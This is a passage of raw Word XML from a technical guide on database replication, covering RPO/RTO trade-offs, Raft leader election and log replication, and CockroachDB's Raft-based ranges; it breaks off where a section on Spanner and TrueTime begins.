    <w:p w14:paraId="7300F767" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  With 10-minute RTO and 4 failures/year: 40 minutes downtime = tight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07202022" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D799C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Synchronous replication required for: RPO = 0 (financial systems, medical records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AF5DE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Asynchronous with automatic failover: RPO = seconds (most web applications)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B1D65C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  No HA (single server): RPO = last backup (hours), RTO = hours = unacceptable for production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51795BCA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="7433B30A">
          <v:rect id="_x0000_i5516" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C34274" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Replication in Distributed Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D92F76" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raft Consensus — The Theoretical Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE9B1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why consensus is necessary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28914176" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>In a distributed system, multiple nodes must agree on a single, consistent sequence of operations — which transactions committed, in what order. Without consensus, divergence is inevitable. Raft is the most widely used consensus algorithm for database replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67891FDC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raft leader election:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12982C84" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F08583" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Raft roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103EF053" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Leader: handles all client requests, replicates to followers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59964BD6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Follower: passive, replicates from leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8269B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Candidate: seeking to become leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E0EA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2510BC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Term: monotonically increasing integer, each term has at most one leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFFBDA2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701AD8AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Election trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7432F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Follower receives no heartbeat for election_timeout (150-300ms, randomized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D92FED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Follower increments its term, becomes Candidate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10665E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Votes for itself, sends RequestVote to all other nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33342B18" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736616CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Voting rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85A392" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Node grants vote if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E0DD7F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    1. Candidate's term &gt;= voter's current term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E3996" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    2. Voter hasn't voted in this term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19141147" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    3. Candidate's log is at least as up-to-date as voter's log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E785D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       (compare last log term, then last log index — ensures candidate has all committed entries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A067A06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058407C2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Majority votes → candidate becomes leader for this term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A4D35" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Sends heartbeats immediately to prevent new elections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0B8C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721D91EB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Log replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7373C63A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Client sends command to leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88819A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leader appends entry to its log (not yet committed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0C563" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leader sends AppendEntries RPC to all followers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10015C02" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3361B7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Followers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11386AAC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Receive AppendEntries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60FD02" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Append entry to their log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD71C3A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Respond success to leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A62C97E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8BA52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770A392" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Entry committed when majority acknowledge it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173FF255" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Leader notifies all followers of commit index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4055A3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    All nodes apply committed entries to their state machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E220EE1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Leader responds to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA19E36" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raft safety guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423F5A9A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383AFBF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Safety invariant: if a log entry is committed, it will be present in all future leaders' logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF9F825" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="39B18167" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Proof sketch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE1DB7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  A leader can only be elected with votes from majority of nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D86D264" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  A committed entry was acknowledged by majority of nodes (in their logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78422928" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D31D3C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  For a candidate to win election, it must have a log at least as up-to-date as the majority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9630AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  The majority that committed the entry overlaps with the majority that elects any future leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5CC83" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → At least one node in the election majority has the committed entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0413A6DE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Candidate with the most up-to-date log has the committed entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F54E12" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Leader always has all committed entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC0BD96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46361469" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Therefore: committed entries are never lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9DB2F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CockroachDB's Raft-based replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1A6827" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1A5DFD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CockroachDB architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9460C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Data distributed across ranges (64MB each, default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59511F56" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Each range: replicated via Raft (default RF=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C01CF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Each Raft group: independent consensus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E1453" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Range A replicated on nodes 1, 2, 3 (with node 2 as Raft leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6EA1D9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Range B replicated on nodes 2, 3, 4 (with node 3 as Raft leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843D8AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    → Raft leadership distributed across nodes (not one global leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDC2C55" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729D774B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF65DDA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Client writes to any node (gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7B335D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Gateway routes to leaseholder for the relevant range (node with Raft lease)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046E2EFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leaseholder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D35DE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Proposes to its Raft group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD84198" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Majority acknowledgment (2/3 nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465923AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Commits, returns to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BAC4A4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C16C023" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Read path (serializable isolation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5E285" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read from leaseholder (has most up-to-date committed state)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5FE010" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leaseholder verifies its lease is current (hasn't been transferred)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78236DD2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Returns current value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02391158" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B20C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Follower reads (reduced-isolation, stale reads):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D055AE5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Read from any follower (may be behind leaseholder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317CE38D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Useful for: geo-distributed reads close to user (lower latency, slightly stale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F326254" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2FCA4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Node failure handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D30E67" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Raft leader fails: automatic new election (typically &lt; 1 second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC2B68" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Range goes under-replicated: other ranges' Raft groups continue unaffected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A1224" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  CockroachDB re-replicates: creates new replica on surviving node to restore RF=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C16D55A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spanner and TrueTime — Global Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4303DB93" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Google Spanner achieves globally consistent reads across geographically distributed nodes using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
